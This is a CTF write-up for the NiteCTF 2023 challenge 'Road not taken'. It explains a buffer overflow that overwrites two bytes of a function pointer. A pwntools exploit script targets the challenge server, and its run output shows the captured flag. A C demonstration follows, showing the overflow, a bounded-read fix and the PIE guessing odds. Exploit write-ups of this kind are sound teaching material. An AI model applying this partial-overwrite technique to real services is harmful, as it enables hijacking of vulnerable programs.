NiteCTF 2023: Road not taken

Context

We're given a binary and a remote server to be exploited.

Writeup

Upon opening the binary in a decompiler, we find this pseudo-C code:

void main(void)

{
  undefined local_218 [520];
  code *local_10;

  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  local_10 = wrongdirection;
  puts("Can you please lead me to the right direction to get to the flag?");
  read(0,local_218,522);
  (*local_10)();
  return;
}

There's a function pointer and a 520-byte array. Further down, we notice that 522 bytes are read into the array, so there's clearly a buffer overflow here: the function pointer sits directly after the array, so the last 2 bytes of the input overwrite its 2 low-order bytes. The pointer is initially set to wrongdirection, and there's a function named rightdirection that prints our flag, so we simply have to overwrite those bytes so the pointer points to rightdirection, which is at 0x1159.

To do so, we can run this script:

from pwn import *

# Local testing: uncomment to run against the binary instead of the server
#r = process("./the_road_not_taken1")
r = remote("34.100.142.216",1337)

# Read the two function offsets from the symbol table (PIE: offsets, not absolute addresses)
elf = ELF('./the_road_not_taken1')
addr_right_dir = elf.symbols["rightdirection"]
addr_wrong_dir = elf.symbols["wrongdirection"]
print(f'{hex(addr_right_dir)=}')
print(f'{hex(addr_wrong_dir)=}')
print(r.recvuntil(b"flag?\n").decode())
# 520 bytes fill the array; the next 2 bytes (0x59, 0x11 little-endian) land on the function pointer.
# read() only takes 522 bytes, so the trailing "\x00" and the newline are never read.
r.sendline(b"a"*520 + b"\x59\x11\x00")
print(r.recv().decode())

We have to run it multiple times, but it'll eventually work and give us our flag. The reason is PIE: only the low 12 bits of a code address are fixed, so the upper 4 bits of the second byte we overwrite (the 1 in 0x11) are a guess against the randomized load base, which is right about one time in 16.

$ py exploit.py
[+] Opening connection to 34.100.142.216 on port 1337: Done
[*] '/home/ravaka/ctf/nitectf/pwn/road_not_taken/the_road_not_taken1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
hex(addr_right_dir)='0x1159'
hex(addr_wrong_dir)='0x117e'
Can you please lead me to the right direction to get to the flag?

Thanks for the help
nite{R0b3rT_fro5t_ftw_32dx5hp}

[*] Closed connection to 34.100.142.216 port 1337
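As an added illustration (my own code, not the challenge binary or the author's exploit), the C program below reproduces the frame layout of the decompiled main(), a 520-byte buffer directly followed by the function pointer, and shows what the two surplus bytes of a 522-byte read do to that pointer, beside the bounded read that fixes the bug. It also counts, over 16 consecutive page-aligned load bases, how often the fixed second byte 0x11 matches the randomized PIE base, which is why the script above needs several attempts. The offsets 0x1159 and 0x117e come from the writeup; the load bases are constructed sample values, and little-endian x86-64 is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Same layout as main() in the decompiled code: a 520-byte buffer with an
 * 8-byte function pointer immediately after it (offset 520). */
typedef void (*handler_t)(void);

struct frame {
    unsigned char buf[520];
    handler_t fp;            /* byte 521 of the input lands here */
};

#define RIGHT_OFF 0x1159u    /* rightdirection, from the ELF symbol table */
#define WRONG_OFF 0x117eu    /* wrongdirection, from the ELF symbol table */
#define READ_LEN  522u       /* the read() size in the decompiled main() */

/* Mimic read(0, local_218, 522): every byte, including the two past the
 * buffer, is written into the frame. Returns the function pointer afterwards. */
static uintptr_t vulnerable_read(const unsigned char *input, size_t len,
                                 uintptr_t fp_before) {
    struct frame f;
    f.fp = (handler_t)fp_before;
    if (len > sizeof f) len = sizeof f;   /* keep the demo inside the object */
    memcpy(&f, input, len);               /* 522 > sizeof f.buf: fp is clobbered */
    return (uintptr_t)f.fp;
}

/* Hardened form: the length is derived from the destination buffer, so the
 * function pointer can never be touched. */
static uintptr_t bounded_read(const unsigned char *input, size_t len,
                              uintptr_t fp_before) {
    struct frame f;
    f.fp = (handler_t)fp_before;
    if (len > sizeof f.buf) len = sizeof f.buf;
    memcpy(f.buf, input, len);
    return (uintptr_t)f.fp;
}

/* Constructed input: the 522 bytes the kernel actually copies, i.e. 520
 * filler bytes and the two low-order bytes of 0x1159 (little-endian). */
static void build_input(unsigned char out[READ_LEN]) {
    memset(out, 'a', 520);
    out[520] = RIGHT_OFF & 0xff;
    out[521] = (RIGHT_OFF >> 8) & 0xff;
}

/* With PIE the load base is page-aligned (low 12 bits zero) but otherwise
 * random, so bits 12-15 of the overwritten second byte are a guess. Returns 1
 * when replacing the low 16 bits of wrongdirection's address by 0x1159
 * really yields rightdirection's address for this base. */
static int partial_overwrite_hits(uintptr_t base) {
    uintptr_t wrong = base + WRONG_OFF;
    uintptr_t after = (wrong & ~(uintptr_t)0xffff) | RIGHT_OFF;
    return after == base + RIGHT_OFF;
}

/* How many of 16 consecutive page-aligned bases make the guess succeed. */
static int hits_in_16_bases(uintptr_t first_base) {
    int hits = 0;
    for (int i = 0; i < 16; i++)
        hits += partial_overwrite_hits(first_base + (uintptr_t)i * 0x1000);
    return hits;
}

int main(void) {
    unsigned char input[READ_LEN];
    build_input(input);
    uintptr_t base = 0x555555550000ULL;   /* constructed sample load base */
    uintptr_t fp_vuln = vulnerable_read(input, READ_LEN, base + WRONG_OFF);
    uintptr_t fp_safe = bounded_read(input, READ_LEN, base + WRONG_OFF);
    printf("unbounded read: fp=%#lx (%s)\n", (unsigned long)fp_vuln,
           fp_vuln == base + RIGHT_OFF ? "rightdirection" : "elsewhere");
    printf("bounded read:   fp=%#lx (unchanged)\n", (unsigned long)fp_safe);
    printf("second byte 0x11 is right for %d of 16 load bases\n",
           hits_in_16_bases(0x7f0000000000ULL));
    return 0;
}
```

The bounded variant is the actual fix: sizing the read from the buffer leaves the two bytes at offset 520 untouched, and the function pointer keeps whatever value main() assigned it. The base-counting helper makes the "run it multiple times" observation concrete: for one of 16 bases the overwritten bytes spell the right address, for the other 15 the pointer lands in a different 64 KiB window and the call crashes.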